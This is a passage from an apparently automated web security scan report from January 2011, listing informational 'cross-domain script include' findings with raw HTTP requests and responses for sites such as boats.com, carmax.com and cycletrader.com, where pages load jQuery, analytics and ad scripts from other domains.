User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; mbox=PC#1295637745501-300919.17#1296864738|check#true#1295655198|session#1295655081531-668160#1295656998; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:16 GMT
Connection: keep-alive
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b4193661;expires=Tue, 25-Jan-11 15:39:16 GMT;path=/
Content-Length: 212255


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="https://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

21.743. http://www.boats.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boats.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=093ab8ab-5461-e2dd5ff4-0fc0-40bb-a961-20106dca9987&lID=1&loc=4q-web1

Request

GET / HTTP/1.1
Host: www.boats.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:57:15 GMT
Server: Apache
Set-Cookie: Apache=10.71.0.26.1295913435664098; path=/; expires=Wed, 26-Jan-11 23:57:15 GMT; domain=.boats.com
Cache-Control: private
Content-Language: en-US
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id_us=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.active_sub_domain_listing_search_country_id=US; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats.listing_search_country_id=100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: cuid=3425338186237716693; domain=.boats.com; path=/; expires=Tue, 24-Jan-2012 23:57:15 GMT
Set-Cookie: JSESSIONID=b7lQLae-ucE5; path=/
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: SL_Audience=870|Accelerated|799|1|0;Expires=Wed, 23-Jan-13 23:57:15 GMT;Path=/;Domain=.boats.com
Set-Cookie: SL_UVId=2B0DFE48C52A7F5A;path=/;
Set-Cookie: SL_NV1=1|1;Expires=Wed, 26-Jan-11 11:57:15 GMT;Path=/;Domain=.boats.com
X-SL-CompState: TouchUp


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<!-- Begin: 4q.iperceptions.com -->
<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=093ab8ab-5461-e2dd5ff4-0fc0-40bb-a961-20106dca9987&lID=1&loc=4q-web1" type="text/javascript" defer="defer" >
</script>
...[SNIP]...

21.744. http://www.boattrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boattrader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:45:55 GMT
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:45:55 GMT
Connection: close
Content-Type: text/html
Set-Cookie: TSef43b4=2ffdd2520e75126ede44933ba8ef34039e5be810eff911074d3e1425759e864aee104e3b; Path=/
Content-Length: 126523

<!-- dstolwebvm01-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Boats for Sale - Buy Boats, Sell Boats, Boating Resources, Boat Dealers, Parts and Accessories - Boat Trader </title>
   <meta http-equiv
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.745. http://www.boattrader.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boattrader.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:40 GMT
X-Powered-By: PHP/5.2.13
Last-Modified: Mon, 24 Jan 2011 23:57:40 GMT
If-Modified-Since: Mon, 24 Jan 2011 23:57:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 25335


<!-- dstolweb02-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Boat Resources: Boat Loans, Insurance, Transport, And More - BoatTrader.com</title>
   <m
...[SNIP]...
</script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.746. http://www.boattrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boattrader.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:46:17 GMT
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 23441


<!-- dstolwebvm01-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New Or Used Boat - Boattrader.com</title>
   <meta name="description" content
...[SNIP]...
</script> -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.747. http://www.boutell.com/lsm/lsmbyid.cgi/002057/x22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boutell.com
Path:   /lsm/lsmbyid.cgi/002057/x22

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /lsm/lsmbyid.cgi/002057/x22 HTTP/1.1
Host: www.boutell.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:04:31 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7843

<title>Linux Software Map: Error</title>
<link href="/main.css" rel="stylesheet" type="text/css">
<!-- SEARCH-ENGINE-OFF -->
<body>
<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.pus
...[SNIP]...
</script>
       <script type="text/javascript"
        src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

       </script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.748. http://www.bymnews.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bymnews.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11731

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<script src="http://www.bymnews.co
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.749. http://www.carmax.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.carmax.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://www.googleadservices.com/pagead/conversion.js

Request

GET / HTTP/1.1
Host: www.carmax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: KMXCOM=UPIJWISKMXCOMWEB052T0x0000000e_0xc6b22d1fCOIKM; expires=Mon, 24-Jan-2011 17:04:31 GMT; path=/
Connection: close
Date: Mon, 24 Jan 2011 16:04:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: KmxVisitor_0=VisitorID=81b44c0b-cf88-4418-90e8-39a8d968f28d&CookieDate=1/24/2011 11:04:32 AM&Zip=; domain=.carmax.com; expires=Tue, 24-Jan-2012 16:04:32 GMT; path=/
Set-Cookie: KmxSession_0=cf2c1e2a-8b04-4848-b9f3-7d2c38c4b661; domain=.carmax.com; path=/
Set-Cookie: KmxCurrSession_0=AB=False&StartDate=1/24/2011 11:04:32 AM&IsIntranet=False&IsHomeOffice=False; domain=.carmax.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 68015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>
   CarMax - Browse used cars and new cars online
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...

21.750. http://www.cdearth.com/photo-image-editor.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cdearth.com
Path:   /photo-image-editor.htm

Issue detail

The response dynamically includes the following script from another domain:
  • https://seal.verisign.com/getseal?host_name=www.cdearth.com&size=M&use_flash=NO&use_transparent=YES&lang=en

Request

GET /photo-image-editor.htm HTTP/1.1
Host: www.cdearth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:05:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=112rl5duvqkmmubehjna1j1ij0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 12648


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"
...[SNIP]...
<td width="50%" align="center"><script src="https://seal.verisign.com/getseal?host_name=www.cdearth.com&size=M&use_flash=NO&use_transparent=YES&lang=en"></script>
...[SNIP]...

21.751. http://www.cloudaccess.net/trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /trial.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB

Request

GET /trial.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<div id="demoCaptcha">

<script type="text/javascript" src="http://api.recaptcha.net/challenge?k=6LcvxgsAAAAAAO9JQTOglTvq6Ycqs2EM7mgFLyiB"></script>
...[SNIP]...

21.752. http://www.codylindley.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codylindley.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js

Request

GET / HTTP/1.1
Host: www.codylindley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:14:37 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 7535

<!DOCTYPE html>
<html>
<head>
<link href="/screen.css" rel="stylesheet" media="all" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="author" content="Cody Lindley
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

21.753. http://www.commercialtrucktrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commercialtrucktrader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 62951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<!-- dstolweb06-php5a -->
<html>
<head>
   <title>Trucks for Sale | Freightliner, Kenworth, Peterbilt, new Trucks and used trucks | Comme
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.754. http://www.commercialtrucktrader.com/research/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commercialtrucktrader.com
Path:   /research/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:05 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 83367

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<!-- dstolweb06-php5b -->
<html>
<head>
   <title>Truck Research and Commercial Truck News & Reviews - CommercialTruckTrader.com</title>

...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.755. http://www.commercialtrucktrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commercialtrucktrader.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 99484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<!-- dstolweb04-php5b -->
<html>
<head>
   <title>Sell Your New or Used Commercial Truck and Trailer - CommercialTruckTrader.com</title>

...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.756. http://www.cycletrader.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET / HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:43 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: location=%5B%7B%22ZIP_CODE%22%3A%2275207%22%2C%22STATE_NAME%22%3A%22Texas%22%2C%22CITY_NAME%22%3A%22Dallas%22%7D%5D; expires=Tue, 24-Jan-2012 23:58:44 GMT
Connection: close
Content-Type: text/html
Content-Length: 93348

<!-- dstolweb09-php5a --><!DOCTYPE html>
<html>
<head>
   <title>Motorcycles - Scooters, Dirt Bikes, Choppers, Sport Bikes, and Other Motorcycles for Sale - Cycle Trader.com</title>
   <meta http-equiv="C
...[SNIP]...
<![endif]-->

       <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.757. http://www.cycletrader.com/find/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /find/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /find/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 135290


<!-- dstolweb02-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Find New and Used Motorcycles for Sale - CycleTrader.com</title>
   <meta name="descripti
...[SNIP]...
</script>
       
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.758. http://www.cycletrader.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /research/resources/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /research/resources/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:52 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 33542


<!-- dstolweb11-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Motorcycle Resources: Finance Insurance and More - CycleTrader.com</title>
   <meta name=
...[SNIP]...
<![endif]-->
   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.759. http://www.cycletrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /sell/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
  • http://d.yimg.com/mi/ywa.js

Request

GET /sell/ HTTP/1.1
Host: www.cycletrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:58:47 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 29864


<!-- dstolweb07-php5a -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Sell Your New or Used Motorcycle - CycleTrader.com</title>
   <meta name="description" co
...[SNIP]...
<![endif]-->
   
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
<!-- Yahoo tracking Code -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...

21.760. http://www.dagondesign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dagondesign.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET / HTTP/1.1
Host: www.dagondesign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:59:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://www.dagondesign.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xf
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.761. http://www.dedipower.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dedipower.com
Path:   /

Issue detail

